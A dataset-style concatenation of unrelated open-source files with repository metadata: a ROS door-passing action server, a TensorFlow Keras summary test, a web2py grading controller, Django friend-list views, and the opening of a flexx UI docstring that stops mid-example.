"content_hash": "efae579fc8a1aa87402e6bcc2d668fc7",
"timestamp": "",
"source": "github",
"line_count": 18,
"max_line_length": 77,
"avg_line_length": 19.444444444444443,
"alnum_prop": 0.6657142857142857,
"repo_name": "SpAiNiOr/mystudy",
"id": "6c2bfe68d4cdfb8465cd451de08068bcbf579a38",
"size": "350",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "Work/AWX/auth.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "DIGITAL Command Language",
"bytes": "13"
},
{
"name": "Dockerfile",
"bytes": "447"
},
{
"name": "Java",
"bytes": "2439"
},
{
"name": "JavaScript",
"bytes": "1422"
},
{
"name": "Python",
"bytes": "12215"
}
],
"symlink_target": ""
} |
import rospy
import actionlib
from actionlib_msgs.msg import GoalStatusArray, GoalStatus
from move_base_msgs.msg import MoveBaseAction
from door_pass.door_utils import DoorUtils
class DoorPass(object):
def __init__(self):
max_trans_vel=rospy.get_param("~max_trans_vel", 0.15)
max_rot_vel=rospy.get_param("~max_rot_vel", 0.4)
vel_scale_factor=rospy.get_param("~vel_scale_factor", 2)
base_radius=rospy.get_param("~base_radius", 0.31)
getting_further_counter_threshold=rospy.get_param("~getting_further_counter_threshold", 5)
distance_to_success=rospy.get_param("~distance_to_success", 0.2)
self.log_checks = rospy.get_param("~log_checks", False)
n_closed_door = rospy.get_param("~n_closed_door", 20)
self.door_utils=DoorUtils(max_trans_vel=max_trans_vel,
max_rot_vel=max_rot_vel,
vel_scale_factor=vel_scale_factor,
base_radius=base_radius,
getting_further_counter_threshold=getting_further_counter_threshold,
distance_to_success=distance_to_success,
n_closed_door = n_closed_door,
consecutive_open_secs = 0)
self.mon_nav_status_sub=rospy.Subscriber("/monitored_navigation/status", GoalStatusArray, self.mon_nav_status_cb)
self.door_as=actionlib.SimpleActionServer('doorPassing', MoveBaseAction, execute_cb = self.execute_cb, auto_start=False)
self.door_as.start()
self.door_as.register_preempt_callback(self.door_as_preempt_cb)
self.mon_nav_executing=False
def mon_nav_status_cb(self, data):
result=False
for goal in data.status_list:
if goal.status==GoalStatus.ACTIVE:
result=True
break
self.mon_nav_executing=result
def execute_cb(self, goal):
self.door_utils.activate()
max_trans_vel=rospy.get_param("~max_trans_vel", 0.15)
max_rot_vel=rospy.get_param("~max_rot_vel", 0.4)
vel_scale_factor=rospy.get_param("~vel_scale_factor", 2)
base_radius=rospy.get_param("~base_radius", 0.31)
getting_further_counter_threshold=rospy.get_param("~getting_further_counter_threshold", 5)
distance_to_success=rospy.get_param("~distance_to_success", 0.2)
n_closed_door = rospy.get_param("~n_closed_door", 20)
self.door_utils.set_params(max_trans_vel=max_trans_vel,
max_rot_vel=max_rot_vel,
vel_scale_factor=vel_scale_factor,
base_radius=base_radius,
getting_further_counter_threshold=getting_further_counter_threshold,
distance_to_success=distance_to_success,
n_closed_door = n_closed_door)
target_pose=goal.target_pose.pose
rospy.loginfo("Door pass action server calling rotate towards pose")
self.door_utils.rotate_towards_pose(target_pose)
if self.door_as.is_preempt_requested():
self.finish_execution(GoalStatus.PREEMPTED)
return
rospy.loginfo("Door pass action server calling check door")
door_open=self.door_utils.check_door(target_pose, log_to_mongo = self.log_checks)
if self.door_as.is_preempt_requested():
self.finish_execution(GoalStatus.PREEMPTED)
return
if door_open:
rospy.loginfo("The door is open. Door pass action server is calling pass door")
success=self.door_utils.pass_door(target_pose)
if self.door_as.is_preempt_requested():
self.finish_execution(GoalStatus.PREEMPTED)
return
if success:
self.finish_execution(GoalStatus.SUCCEEDED)
return
else:
self.finish_execution(GoalStatus.ABORTED)
return
else:
rospy.loginfo("Door is closed. Disabling monitored navigation recoveries.")
current_mon_nav_recover_states=rospy.get_param("/monitored_navigation/recover_states/", {})
for mon_nav_recover_state in current_mon_nav_recover_states:
rospy.set_param("/monitored_navigation/recover_states/" + mon_nav_recover_state, [False,0])
self.finish_execution(GoalStatus.ABORTED)
#wait for mon nav to output failure and get recover states back on
timeout=0
while self.mon_nav_executing and not self.door_as.is_preempt_requested() and timeout<30:
rospy.loginfo("Waiting for monitored navigation to stop executing")
rospy.sleep(0.1)
timeout=timeout+1
rospy.loginfo("Monitored navigation stopped executing. Resetting monitored navigation recoveries.")
rospy.set_param("/monitored_navigation/recover_states/", current_mon_nav_recover_states)
return
def finish_execution(self, status):
rospy.loginfo("Door passing finished with outcome " + GoalStatus.to_string(status))
self.door_utils.deactivate()
if status==GoalStatus.SUCCEEDED:
self.door_as.set_succeeded()
if status==GoalStatus.ABORTED:
self.door_as.set_aborted()
if status==GoalStatus.PREEMPTED:
self.door_as.set_preempted()
def door_as_preempt_cb(self):
self.door_utils.deactivate()
def main(self):
rospy.spin()
if __name__ == '__main__':
rospy.init_node("door_pass_node")
passer=DoorPass()
passer.main()
| {
"content_hash": "dd83150be5d799a18a1422ed46fa50bd",
"timestamp": "",
"source": "github",
"line_count": 126,
"max_line_length": 129,
"avg_line_length": 46.46825396825397,
"alnum_prop": 0.5940222032450897,
"repo_name": "strands-project/strands_apps",
"id": "977c00b56cd78d8e8ae76210390925da60440ca1",
"size": "5879",
"binary": false,
"copies": "2",
"ref": "refs/heads/indigo-devel",
"path": "door_pass/scripts/door_passing.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "C++",
"bytes": "32677"
},
{
"name": "CMake",
"bytes": "24963"
},
{
"name": "Python",
"bytes": "122957"
},
{
"name": "Shell",
"bytes": "649"
}
],
"symlink_target": ""
} |
"""Tests for V2 summary ops from summary_ops_v2."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
from tensorflow.core.util import event_pb2
from tensorflow.python.keras import testing_utils
from tensorflow.python.keras.engine.sequential import Sequential
from tensorflow.python.keras.engine.training import Model
from tensorflow.python.keras.layers.core import Activation
from tensorflow.python.keras.layers.core import Dense
from tensorflow.python.lib.io import tf_record
from tensorflow.python.ops import summary_ops_v2 as summary_ops
from tensorflow.python.platform import gfile
from tensorflow.python.platform import test
from tensorflow.python.platform import tf_logging as logging
class SummaryOpsTest(test.TestCase):
def tearDown(self):
super(SummaryOpsTest, self).tearDown()
summary_ops.trace_off()
def keras_model(self, *args, **kwargs):
logdir = self.get_temp_dir()
writer = summary_ops.create_file_writer(logdir)
with writer.as_default():
summary_ops.keras_model(*args, **kwargs)
writer.close()
events = events_from_logdir(logdir)
# The first event contains no summary values. The written content goes to
# the second event.
return events[1]
@testing_utils.run_v2_only
def testKerasModel(self):
model = Sequential(
[Dense(10, input_shape=(100,)),
Activation('relu', name='my_relu')])
event = self.keras_model(name='my_name', data=model, step=1)
first_val = event.summary.value[0]
self.assertEqual(model.to_json(), first_val.tensor.string_val[0].decode())
@testing_utils.run_v2_only
def testKerasModel_usesDefaultStep(self):
model = Sequential(
[Dense(10, input_shape=(100,)),
Activation('relu', name='my_relu')])
try:
summary_ops.set_step(42)
event = self.keras_model(name='my_name', data=model)
self.assertEqual(42, event.step)
finally:
# Reset to default state for other tests.
summary_ops.set_step(None)
@testing_utils.run_v2_only
def testKerasModel_subclass(self):
class SimpleSubclass(Model):
def __init__(self):
super(SimpleSubclass, self).__init__(name='subclass')
self.dense = Dense(10, input_shape=(100,))
self.activation = Activation('relu', name='my_relu')
def call(self, inputs):
x = self.dense(inputs)
return self.activation(x)
model = SimpleSubclass()
with test.mock.patch.object(logging, 'warn') as mock_log:
self.assertFalse(
summary_ops.keras_model(name='my_name', data=model, step=1))
self.assertRegex(
str(mock_log.call_args), 'Model failed to serialize as JSON.')
@testing_utils.run_v2_only
def testKerasModel_otherExceptions(self):
model = Sequential()
with test.mock.patch.object(model, 'to_json') as mock_to_json:
with test.mock.patch.object(logging, 'warn') as mock_log:
mock_to_json.side_effect = Exception('oops')
self.assertFalse(
summary_ops.keras_model(name='my_name', data=model, step=1))
self.assertRegex(
str(mock_log.call_args),
'Model failed to serialize as JSON. Ignoring... oops')
def events_from_file(filepath):
"""Returns all events in a single event file.
Args:
filepath: Path to the event file.
Returns:
A list of all tf.Event protos in the event file.
"""
records = list(tf_record.tf_record_iterator(filepath))
result = []
for r in records:
event = event_pb2.Event()
event.ParseFromString(r)
result.append(event)
return result
def events_from_logdir(logdir):
"""Returns all events in the single eventfile in logdir.
Args:
logdir: The directory in which the single event file is sought.
Returns:
A list of all tf.Event protos from the single event file.
Raises:
AssertionError: If logdir does not contain exactly one file.
"""
assert gfile.Exists(logdir)
files = gfile.ListDirectory(logdir)
assert len(files) == 1, 'Found not exactly one file in logdir: %s' % files
return events_from_file(os.path.join(logdir, files[0]))
if __name__ == '__main__':
test.main()
| {
"content_hash": "0a1da881bcc5f4ff831785fdd8361cca",
"timestamp": "",
"source": "github",
"line_count": 133,
"max_line_length": 78,
"avg_line_length": 31.646616541353385,
"alnum_prop": 0.6851983844143502,
"repo_name": "aldian/tensorflow",
"id": "7d9a89ec60c31fdd499fb1527bb8bb4f26fea7c9",
"size": "4898",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "tensorflow/python/keras/tests/summary_ops_test.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Batchfile",
"bytes": "8458"
},
{
"name": "C",
"bytes": "201402"
},
{
"name": "C++",
"bytes": "29667924"
},
{
"name": "CMake",
"bytes": "647100"
},
{
"name": "Go",
"bytes": "976514"
},
{
"name": "Java",
"bytes": "412117"
},
{
"name": "Jupyter Notebook",
"bytes": "1833675"
},
{
"name": "LLVM",
"bytes": "6536"
},
{
"name": "Makefile",
"bytes": "38128"
},
{
"name": "Objective-C",
"bytes": "7056"
},
{
"name": "Objective-C++",
"bytes": "63210"
},
{
"name": "Perl",
"bytes": "6715"
},
{
"name": "Protocol Buffer",
"bytes": "275733"
},
{
"name": "PureBasic",
"bytes": "24932"
},
{
"name": "Python",
"bytes": "26424665"
},
{
"name": "Ruby",
"bytes": "327"
},
{
"name": "Shell",
"bytes": "373109"
}
],
"symlink_target": ""
} |
import access
import util
from datetime import datetime
import numpy as np
import gluon.contrib.simplejson as simplejson
@auth.requires_login()
def view_submissions():
"""This function enables the view of the ranking of items submitted to a
venue. It is assumed that the people accessing this can have full
information about the venue, including the identity of the submitters."""
c = db.venue(request.args(0)) or redirect(URL('default', 'index'))
props = db(db.user_properties.user == get_user_email()).select().first()
if not access.can_view_submissions(c, props):
session.flash = T('You do not have access to the submissions of this venue.')
redirect(URL('venues', 'view_venue', args=[c.id]))
# Prepares the query for the grid.
q = (db.submission.venue_id == c.id)
db.submission.quality.readable = False
db.submission.error.readable = False
db.submission.content.readable = False
db.submission.content.writable = False
db.submission.comment.writable = False
db.submission.n_assigned_reviews.readable = True
db.submission.n_assigned_reviews.label = T('Reviews Assigned')
db.submission.n_completed_reviews.label = T('Done')
db.submission.n_rejected_reviews.label = T('Declined')
if c.allow_link_submission:
db.submission.link.readable = True
# Sets the fields.
fields=[db.submission.user, db.submission.percentile,
db.submission.n_assigned_reviews, db.submission.n_completed_reviews,
db.submission.n_rejected_reviews]
# Sets the link to view/edit the feedback.
links=[]
if access.can_view_feedback(c, props):
links.append(dict(header=T('Feedback'),
body = lambda r: A(T('View'), _class='btn',
_href=URL('feedback', 'view_feedback', args=['s', r.id]))))
grid = SQLFORM.grid(q,
field_id=db.submission.id,
csv=True,
args=request.args[:1],
user_signature=False,
details=False, create=False,
editable=False,
deletable=False,
fields=fields,
links=links,
links_placement='left',
maxtextlength=24,
)
title = A(c.name, _href=URL('venues', 'view_venue', args=[c.id]))
return dict(title=title, grid=grid)
def get_num_reviews(subm_id, venue_id):
"""This function is used to heal old databases, and produce the count
of completed reviews for each submission.
In future releases, this is computed automatically by the review function."""
# Tries to answer fast.
subm = db.submission(subm_id)
if subm.n_completed_reviews is not None:
return subm.n_completed_reviews
# Computes the number of reviews for each item.
n = db((db.task.venue_id == venue_id) &
(db.task.submission_id == subm.id) &
(db.task.completed_date < datetime.utcnow())).count()
# Stores it in the submission.
subm.n_completed_reviews = n
subm.update_record()
db.commit()
return n
@auth.requires_login()
def view_raters():
"""This function shows the contribution of each user to the total ranking of a venue."""
c = db.venue(request.args(0)) or redirect(URL('default', 'index'))
props = db(db.user_properties.user == get_user_email()).select().first()
if not access.can_view_rating_contributions(c, props):
session.flash = T('You do not have access to the rater contributions for this venue.')
redirect(URL('venues', 'view_venue', args=[c.id]))
# Prepares the query for the grid.
q = (db.grades.venue_id == c.id)
grid = SQLFORM.grid(q,
args=request.args[:1],
user_signature=False, details=True,
create=False, editable=False, deletable=False,
fields=[db.grades.user, db.grades.accuracy,
db.grades.reputation, db.grades.n_ratings],
maxtextlength=24,
)
title = A(c.name, _href=URL('venues', 'view_venue', args=[c.id]))
return dict(grid=grid, title=title)
def short_float_or_None(val):
if val is None:
return None
return float("%.3f" % val)
@auth.requires_login()
def view_grades():
"""This function shows the final grade of each user.
It takes as single argument the venue id.
"""
# This function is used to get experimental grades from the db.
def get_grade_fn(venue_id, run_id):
def f(row):
row = db((db.grades_exp.venue_id == venue_id) &
(db.grades_exp.user == row.user) &
(db.grades_exp.run_id == run_id)).select().first()
if row is None:
return 'None'
# Generates a string summary.
s = "subm_grade: %r subm_confidence: %r rev: %r rep: %r tot: %r" % (
short_float_or_None(row.subm_grade),
short_float_or_None(row.subm_confidence),
short_float_or_None(row.review_grade),
short_float_or_None(row.reputation),
short_float_or_None(row.grade))
return s
return f
# Main function.
c = db.venue(request.args(0)) or redirect(URL('default', 'index'))
props = db(db.user_properties.user == get_user_email()).select().first()
if not access.can_view_ratings(c, props):
session.flash = T('You do not have access to the final grades for this venue.')
redirect(URL('venues', 'view_venue', args=[c.id]))
# Checking that final grades are recent and don't need recomputation.
venue_row = db(db.venue.id == c.id).select().first()
grades_date = venue_row.latest_grades_date
if grades_date is None:
session.flash = T('The crowd-grades have not been computed yet.')
redirect(URL('rating', 'crowd_grade', args=[c.id]))
# The crowd-grades have been computed already.
if is_user_admin():
db.grades.reputation.readable = True
db.grades.user.represent = represent_user_by_submission_feedback
db.grades.venue_id.readable = False
# Prepares the buttons at the top.
link_list = []
if access.can_manage(c, props):
db.grades.assigned_grade.writable = True
db.grades.assigned_grade.comment = T('Assign the desired grade to a few users, '
'then automatically fill-in the remaining '
'grades via interpolation. ')
is_editable = True
link_list.append(A(T('Recompute crowd-grades'), _href=URL('rating', 'crowd_grade', args=[c.id])))
link_list.append(A(T('Interpolate final grades'),
_href=URL('ranking', 'interpolate_grades', args=[c.id], user_signature=True)))
link_list.append(A(T('Clear final grades'),
_href=URL('ranking', 'reset_grades', args=[c.id], user_signature=True)))
# Creates button to release / withdraw grades.
if c.grades_released:
link_list.append(A(T('Hide grades from students'),
_href=URL('ranking', 'release_grades', args=[c.id, 'False'], user_signature=True)))
else:
link_list.append(A(T('Show grades to students'),
_href=URL('ranking', 'release_grades', args=[c.id, 'True'], user_signature=True)))
else:
db.grades.assigned_grade.writable = False
is_editable = False
# If one is the manager, and we are viewing experimental grades, offers the option
# to download a spreadsheet including the experimental grades.
if is_user_admin():
link_list.append(A(T('View experimental runs'),
_href=URL('ranking', 'view_exp_grades', args=[c.id])))
if is_user_admin() and request.vars.run_ids is not None:
link_list.append(A(T('Download research data'),
_href=URL('research', 'download_research_data.csv', args=[c.id],
vars=dict(run_ids=request.vars.run_ids),
user_signature=True)))
if is_user_admin():
link_list.append(A(T('Evaluate grades'),
_href=URL('research', 'evaluate_grades', args=[c.id],
user_signature=True)))
link_list.append(A(T('Rerun evaluations'),
_href=URL('research', 'rerun_evaluations', args=[c.id],
user_signature=True)))
# Chooses the display fields.
display_fields = [
db.grades.user, db.grades.venue_id,
db.grades.submission_grade, db.grades.submission_percentile,
db.grades.accuracy, db.grades.n_ratings,
db.grades.grade, db.grades.percentile,
db.grades.assigned_grade]
if is_user_admin():
display_fields.append(db.grades.reputation)
display_fields.append(db.grades.submission_control_grade)
db.grades.submission_control_grade.readable = True
# Adds columns for any extra grade we wish to see.
grid_links = []
if is_user_admin() and request.vars.run_ids is not None:
run_ids = request.vars.run_ids.split(',')
for r in run_ids:
grid_links.append(dict(
header = r,
body = get_grade_fn(c.id, r)))
if is_user_admin():
# Adds a column for the true grade.
grid_links.append(dict(
header = '',
body = lambda row: A(T('Enter control grade'), _class='btn',
_href=URL('ranking', 'edit_control_grade', args=[c.id, row.user], user_signature=True))))
# Prepares the grid.
q = (db.grades.venue_id == c.id)
grid = SQLFORM.grid(q,
fields=display_fields,
args=request.args[:1],
user_signature=False, details=False,
create=False, editable=is_editable, deletable=False,
links=grid_links,
maxtextlength=24,
)
title = A(c.name, _href=URL('venues', 'view_venue', args=[c.id]))
grades_date_info = represent_date(c.latest_grades_date, c)
if c.grades_released:
grades_visibility = T('Grades are visible to students')
else:
grades_visibility = T('Grades are not visible to students')
return dict(grid=grid, title=title, link_list=link_list,
grades_date_info=grades_date_info, grades_visibility=grades_visibility)
@auth.requires_signature()
def edit_control_grade():
"""Allows admins to edit the control grade. Arguments:
venue id, user."""
if not is_user_admin():
session.flash = T('Not Authorized.')
redirect(URL('default', 'index'))
c = db.venue(request.args(0)) or redirect(URL('default', 'index'))
# props = db(db.user_properties.user == get_user_email()).select().first()
# No modifications to any assigned grade.
db.grades.assigned_grade.writable = False
db.grades.submission_control_grade.readable = db.grades.submission_control_grade.writable = True
row = db((db.grades.venue_id == c.id) & (db.grades.user == request.args(1))).select().first()
if row is None:
session.flash = T('No record found for the given user.')
redirect(URL('ranking', 'view_grades', args=[c.id]))
form = SQLFORM(db.grades, record=row)
if form.process().accepted:
session.flash = T('The control grade has been inserted.')
if request.env.http_referrer:
redirect(request.env.http_referrer)
else:
redirect(URL('ranking', 'view_grades', args=[c.id]))
# Generates a link to view the submission.
subm_link = A(T('View submission'), _class='btn',
_href=URL('feedback', 'view_feedback', args=['u', c.id, row.user]))
return dict(form=form, subm_link=subm_link)
@auth.requires_signature()
def release_grades():
c = db.venue(request.args(0)) or redirect(URL('default', 'index'))
visible = (request.args(1) == 'True')
props = db(db.user_properties.user == get_user_email()).select().first()
if not access.can_manage(c, props):
session.flash = T('Not authorized')
redirect(URL('ranking', 'view_grades', args=[c.id]))
db(db.venue.id == c.id).update(grades_released = visible)
db.commit()
if visible:
session.flash = T('The grades are now visible to students.')
else:
session.flash = T('The grades are no longer visible to students.')
redirect(URL('ranking', 'view_grades', args=[c.id]))
@auth.requires_signature()
def reset_grades():
"""This function resets the final grades to None."""
c = db.venue(request.args(0)) or redirect(URL('default', 'index'))
props = db(db.user_properties.user == get_user_email()).select().first()
if not access.can_manage(c, props):
session.flash = T('Not authorized')
redirect(URL('ranking', 'view_grades', args=[c.id]))
db(db.grades.venue_id == c.id).update(assigned_grade = None)
db.commit()
session.flash = T('The grades have been cleared.')
redirect(URL('ranking', 'view_grades', args=[c.id]))
@auth.requires_signature()
def interpolate_grades():
"""This function interpolates the specified final grades."""
c = db.venue(request.args(0)) or redirect(URL('default', 'index'))
props = db(db.user_properties.user == get_user_email()).select().first()
if not access.can_manage(c, props):
session.flash = T('Not authorized')
redirect(URL('ranking', 'view_grades', args=[c.id]))
grades = db(db.grades.venue_id == c.id).select(db.grades.id, db.grades.grade, db.grades.assigned_grade, orderby=db.grades.percentile).as_list()
if len(grades) == 0:
return
# Fixes the lower end.
last_assigned_idx = 0
last_assigned_crowd_grade = util.get_or_0(grades[0], 'grade')
if grades[0]['assigned_grade'] is None:
last_assigned_grade = 0.0
db(db.grades.id == grades[0]['id']).update(assigned_grade = 0.0)
else:
last_assigned_grade = grades[0]['assigned_grade']
# Interpolates the rest.
for i, g in enumerate(grades):
assigned_grade = g['assigned_grade']
if assigned_grade is not None:
# Interpolates from previous to this one.
end_crowd_grade = util.get_or_0(g, 'grade')
for k in range(last_assigned_idx + 1, i):
crowd_grade = util.get_or_0(grades[k], 'grade')
if end_crowd_grade == last_assigned_crowd_grade:
new_grade = end_crowd_grade
else:
new_grade = (last_assigned_grade + (assigned_grade - last_assigned_grade) *
(crowd_grade - last_assigned_crowd_grade) /
(end_crowd_grade - last_assigned_crowd_grade))
db(db.grades.id == grades[k]['id']).update(assigned_grade = new_grade)
last_assigned_idx = i
last_assigned_grade = assigned_grade
last_assigned_crowd_grade = end_crowd_grade
db.commit()
session.flash = T('The grades have been interpolated.')
redirect(URL('ranking', 'view_grades', args=[c.id]))
def represent_task_name_view_feedback(v, r):
return A(T('View submission'), _class='btn', _href=URL('feedback', 'view_feedback', args=['s', r.submission_id]))
@auth.requires_login()
def view_comparison():
"""This function displays an individual task."""
# We are given the task id.
t = db.task(request.args(0)) or redirect(URL('default', 'index'))
rating_user = t.user
submission_id = t.submission_id
# We need to get the most recent comparison by the user who has done this task.
comp = db((db.comparison.venue_id == t.venue_id) &
(db.comparison.user == t.user)).select(orderby=~db.comparison.date).first()
c = db.venue(t.venue_id) or redirect(URL('default', 'index'))
props = db(db.user_properties.user == get_user_email()).select().first()
subm = db.submission(submission_id)
if not access.can_observe(c, props):
session.flash = T('Not authorized')
redirect(URL('default', 'index'))
db.comparison.id.readable = False
db.comparison.ordering.readable = False
db.comparison.grades.represent = represent_grades
db.comparison.date.readable = False
db.comparison.is_valid.readable = False
db.task.user.readable = True
db.task.user.label = T('Reviewer')
db.task.user.represent = lambda v, r: A(v, _href=URL('feedback', 'view_feedback', args=['u', c.id, v]))
db.task.venue_id.readable = True
db.task.venue_id.represent = represent_venue_id
db.task.comments.readable = True
db.task.is_completed.readable = True
db.task.rejected.readable = True
db.task.helpfulness.readable = True
db.task.feedback.readable = True
db.comparison.venue_id.readable = (t is None)
db.comparison.venue_id.represent = represent_venue_id
db.comparison.user.readable = (comp is None)
db.comparison.user.label = T('Reviewer')
if comp is None:
comp_form = T('No corresponding comparison found.')
else:
comp_form = SQLFORM(db.comparison, record=comp, readonly=True)
task_form = SQLFORM(db.task, record=t, readonly=True)
return dict(comp_form=comp_form, task_form=task_form, user=rating_user, subm_id=submission_id,
subm=subm)
@auth.requires_login()
def view_comparisons_index():
"""This function displays all comparisons for a venue."""
props = db(db.user_properties.user == get_user_email()).select().first()
c = db.venue(request.args(0)) or redirect(URL('default', 'index'))
if not access.can_observe(c, props):
session.flash = T('Not authorized')
redirect(URL('default', 'index'))
q = ((db.comparison.venue_id == c.id) & (db.comparison.is_valid == True))
db.comparison.ordering.represent = represent_ordering
db.comparison.user.represent = represent_user_by_submission_feedback
db.comparison.venue_id.readable = False
fields=[db.comparison.user, db.comparison.venue_id,
db.comparison.grades, db.comparison.submission_nicknames, db.comparison.date,]
if is_user_admin():
fields=[db.comparison.user, db.comparison.venue_id, db.comparison.grades,
db.comparison.submission_nicknames, db.comparison.is_valid, db.comparison.date,]
q = (db.comparison.venue_id == c.id)
grid = SQLFORM.grid(q,
field_id=db.comparison.id,
fields=fields,
csv=True,
args=request.args[:1],
user_signature=False,
details=False, create=False,
editable=False, deletable=False,
maxtextlength=24,
)
title = T('Comparisons for venue ' + c.name)
return dict(title=title, grid=grid)
@auth.requires_login()
def view_comparisons_given_submission():
"""This function displays comparisons wich contains given submission."""
props = db(db.user_properties.user == get_user_email()).select().first()
subm = db.submission(request.args(0)) or redirect(URL('default', 'index'))
c = db.venue(subm.venue_id) or redirect(URL('default', 'index'))
if not access.can_observe(c, props):
session.flash = T('Not authorized')
redirect(URL('default', 'index'))
# Create query.
# First, determine the people who have reviewed this submission.
reviewers_r = db(db.task.submission_id == subm.id).select(db.task.user).as_list()
reviewers = [x['user'] for x in reviewers_r]
# Second, displays all the comparisons by these users in this venue.
q = ((db.comparison.venue_id == c.id) &
(db.comparison.user.belongs(reviewers)) & (db.comparison.is_valid == True))
db.comparison.ordering.represent = represent_ordering
db.comparison.user.represent = represent_user_by_submission_feedback
db.comparison.venue_id.readable = False
fields=[db.comparison.user, db.comparison.venue_id,
db.comparison.grades, db.comparison.submission_nicknames, db.comparison.date,]
if is_user_admin():
fields=[db.comparison.user, db.comparison.venue_id,
db.comparison.grades, db.comparison.submission_nicknames,
db.comparison.is_valid, db.comparison.date,]
q = ((db.comparison.venue_id == c.id) & (db.comparison.user.belongs(reviewers)))
grid = SQLFORM.grid(q,
field_id=db.comparison.id,
fields=fields,
csv=True,
args=request.args[:1],
user_signature=False,
details=False, create=False,
editable=False, deletable=False,
maxtextlength=24,
)
return dict(subm=subm, venue=c, grid=grid)
@auth.requires_login()
def view_comparisons_given_user():
"""This function displays comparisons for a user in a given venue.
The arguments are user, venue_id."""
props = db(db.user_properties.user == get_user_email()).select().first()
user = request.args(0) or redirect(URL('default', 'index'))
venue_id = request.args(1) or redirect(URL('default', 'index'))
c = db.venue(venue_id) or redirect(URL('default', 'index'))
if not access.can_observe(c, props):
session.flash = T('Not authorized')
redirect(URL('default', 'index'))
# Create query.
q = ((db.comparison.venue_id == venue_id) &
(db.comparison.user == user) & (db.comparison.is_valid == True))
db.comparison.ordering.represent = represent_ordering
db.comparison.venue_id.readable = False
db.comparison.user.represent = represent_user_by_submission_feedback
fields=[db.comparison.user, db.comparison.venue_id,
db.comparison.grades, db.comparison.submission_nicknames, db.comparison.date,]
if is_user_admin():
fields=[db.comparison.user, db.comparison.venue_id, db.comparison.grades,
db.comparison.submission_nicknames, db.comparison.is_valid, db.comparison.date,]
q = ((db.comparison.venue_id == venue_id) &
(db.comparison.user == user))
grid = SQLFORM.grid(q,
field_id=db.comparison.id,
fields=fields,
csv=True,
args=request.args[:2],
user_signature=False,
details=False, create=False,
editable=False, deletable=False,
maxtextlength=24,
)
return dict(user=user, venue=c, grid=grid)
@auth.requires_login()
def view_exp_grades():
"""This function enables to select experimental grades
that are available for a venue, and display them."""
if not is_user_admin():
session.flash = T('Not authorized.')
redirect(URL('default', 'index'))
c = db.venue(request.args(0))
rows = db(db.grades_exp.venue_id == c.id).select(db.grades_exp.run_id, distinct=True)
experiment_list = [r.run_id for r in rows]
# Produces a multiple-choice form, indicating which results one wants to display.
form = SQLFORM.factory(
Field('run_ids', 'list:string', requires=IS_IN_SET(experiment_list, multiple=True)),
)
if form.process().accepted:
# Redirects to displaying those selected experiments.
if isinstance(form.vars.run_ids, basestring):
exp_list = form.vars.run_ids
else:
exp_list = ','.join(form.vars.run_ids)
redirect(URL('ranking', 'view_grades', args=[request.args(0)], vars={'run_ids': exp_list}))
venue_link = A(c.name, _href=URL('venues', 'view_venue', args=[c.id]))
return dict(form=form, venue_link=venue_link)
| {
"content_hash": "d42820b935ba1105aee9a79280e922b3",
"timestamp": "",
"source": "github",
"line_count": 510,
"max_line_length": 147,
"avg_line_length": 45.92745098039216,
"alnum_prop": 0.6225504845664518,
"repo_name": "lucadealfaro/crowdranker",
"id": "9db9371077d5e2cb6de7b4beeed39bf4bf16425f",
"size": "23448",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "controllers/ranking.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "28695"
},
{
"name": "JavaScript",
"bytes": "143454"
},
{
"name": "Python",
"bytes": "500631"
}
],
"symlink_target": ""
} |
from django.contrib.auth.models import User
from django.shortcuts import render
from django.contrib.auth.decorators import login_required
from django.views.decorators.http import require_POST
from django.http import HttpResponseRedirect
from social.models import Friend
@login_required
def friendlist(request):
friends_inbound = Friend.objects.filter(accepted = True, to_user = request.user)
friends_outbound = Friend.objects.filter(accepted = True, from_user = request.user)
friends = [x.from_user for x in friends_inbound]
friends.extend([y.to_user for y in friends_outbound])
return render(request, 'friends.html', {'friends': friends,
'invites': Friend.objects.filter(to_user = request.user, accepted = False)})
@login_required
def remove_friend(request, id):
try:
friend = User.objects.get(pk = id)
Friend.objects.filter(from_user = request.user, to_user = friend).delete()
Friend.objects.filter(to_user = request.user, from_user = friend).delete()
except:
pass
return HttpResponseRedirect('/social/friends/')
@login_required
@require_POST
def request_friend(request):
# TODO: Handle prettier than throw
try:
other = User.objects.get(username = request.REQUEST['name'])
if other == request.user:
raise "Cannot befriend yourself"
if (len(Friend.objects.filter(from_user = request.user, to_user = other)) > 0) or (len(Friend.objects.filter(to_user = request.user, from_user = other)) > 0):
raise "Relation already exists"
Friend(from_user = request.user, to_user = other).save()
except:
pass
return HttpResponseRedirect('/social/friends/')
@login_required
def accept_request(request, id):
try:
f = Friend.objects.get(pk = id, to_user = request.user)
f.accepted = True
f.save()
except:
pass
return HttpResponseRedirect('/social/friends/')
@login_required
def deny_request(request, id):
try:
f = Friend.objects.get(pk = id, to_user = request.user)
f.delete()
except:
pass
return HttpResponseRedirect('/social/friends/') | {
"content_hash": "40262f8a91a171ad38aa13e9f86f0f21",
"timestamp": "",
"source": "github",
"line_count": 63,
"max_line_length": 166,
"avg_line_length": 34.42857142857143,
"alnum_prop": 0.6754264638082066,
"repo_name": "Ezphares/sw809f14",
"id": "42b882306da473484980a47a562164275d9e4d6a",
"size": "2195",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "runweb/social/views.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "6883"
},
{
"name": "Groovy",
"bytes": "853"
},
{
"name": "Java",
"bytes": "32589"
},
{
"name": "JavaScript",
"bytes": "78998"
},
{
"name": "Python",
"bytes": "29264"
},
{
"name": "Shell",
"bytes": "2586"
}
],
"symlink_target": ""
} |
"""
Simple example:
.. UIExample:: 50
b = ui.Button(text="Push me")
Example with interaction:
.. UIExample:: 200
from flexx import app, ui, event
class Example(ui.BoxPanel):
def init(self):
with ui.VBox():
self.b1 = ui.Button(text='apple')
self.b2 = ui.Button(text='banana')
self.b3 = ui.Button(text='pear')
self.buttonlabel= ui.Label(text='...')
with ui.VBox():
self.r1 = ui.RadioButton(text='apple')
self.r2 = ui.RadioButton(text='banana')
self.r3 = ui.RadioButton(text='pear')
self.radiolabel = ui.Label(text='...')
with ui.VBox():
